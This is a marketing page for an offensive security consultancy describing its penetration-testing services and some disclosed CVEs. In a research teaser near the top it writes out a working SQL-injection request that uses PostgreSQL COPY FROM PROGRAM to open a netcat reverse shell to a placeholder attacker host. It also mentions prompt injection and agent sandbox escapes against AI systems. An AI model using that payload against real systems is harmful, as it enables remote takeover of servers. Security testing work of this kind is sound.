Baldur Security is a Danish, research-driven offensive security consultancy. We have responsibly disclosed vulnerabilities leading to CVEs in software used by millions, including Chrome, Fortinet, Mitel, PRTG, Nagios and WithSecure. We test your applications the same way.
This is the same work we do on your systems, not a scanner report with the logo changed. A selection from our research; the full list is on the research page.
# One <img> tag became a GET-based SQL injection which was then used for remote code execution GET /api/v1/malware/threats?query=a');COPY pwn FROM PROGRAM 'rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc ATTACKER 8959 >/tmp/a';--
FROM PROGRAM turned a stored avatar into a reverse shell. Full chain →Every engagement ends with proof you can act on and documentation you can hand to auditors, customers and the board.
One team. If what you need tested is not listed here, ask, the interesting targets rarely fit a category.
Manual testing plus source-code review. We read the code and prove exploitability by hand, not just probe the surface.
Read more → 02We start as a compromised employee inside your network and show how far a skilled attacker gets, then exactly what stops them.
Read more → 03AWS, Azure and GCP: identity, misconfiguration and privilege-escalation paths, tested the way attackers actually move, not a checklist scan.
Read more → 04Line-by-line review across most stacks. Source-assisted testing finds the logic and access-control bugs scanners walk straight past.
Read more → 05Security wired into your CI/CD: SAST, DAST, dependency and IaC scanning, and pipelines your developers will actually keep using.
Read more → 06Coverage-guided fuzzing and manual reversing of binaries and firmware. We took a Mitel IP phone from nothing to unauthenticated root (CVE-2024-31963).
Read more → 07External and internal network testing: exposed services, patch gaps and lateral-movement paths, exploited by hand and verified.
Read more → 08We audit the LLMs and agents you ship, and the AI in your pipeline: prompt injection with real impact, agent sandbox escapes and data exposure. That is how we found an RCE in an AI pentester agent.
Read more →12+ years across sectors like banking, healthcare and the public sector, for organisations from 10 to 10,000 employees. We value real-world experience highest, and we have the certifications to back it up.
A 30-minute call is enough to scope most engagements. No account, no sales script, you talk to the people who do the testing.
Book a scoping call